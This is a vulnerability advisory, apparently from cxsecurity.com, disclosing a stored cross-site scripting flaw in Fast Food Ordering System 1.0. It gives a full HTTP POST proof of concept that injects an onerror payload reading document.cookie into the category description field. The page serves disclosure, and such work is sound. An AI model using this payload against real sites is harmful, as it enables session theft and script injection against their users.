Fast Food Ordering System 1.0 Cross Site Scripting

2022.05.31
Credit: Ashish Kumar
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting ## Author: Ashish Kumar ## Date: 05.31.2022 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html ## Reference: https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6 #Description: #The Line 255 of Master.php sends unvalidated data to a web browser, which can result in the browser executing malicious code. #echo $Master->save_category(); #PoC: POST /ffos/classes/Master.php?f=save_category HTTP/1.1 Host: localhost Content-Length: 480 sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySmYVeqOBMhcSziZM X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ffos/admin/?page=categories Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcj Connection: close ------WebKitFormBoundarySmYVeqOBMhcSziZM Content-Disposition: form-data; name="id" 10 ------WebKitFormBoundarySmYVeqOBMhcSziZM Content-Disposition: form-data; name="name" XSS ------WebKitFormBoundarySmYVeqOBMhcSziZM Content-Disposition: form-data; name="description" Testing XSS "><img src="" onerror="alert(document.cookie)"> ------WebKitFormBoundarySmYVeqOBMhcSziZM Content-Disposition: form-data; name="status" 1 ------WebKitFormBoundarySmYVeqOBMhcSziZM--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top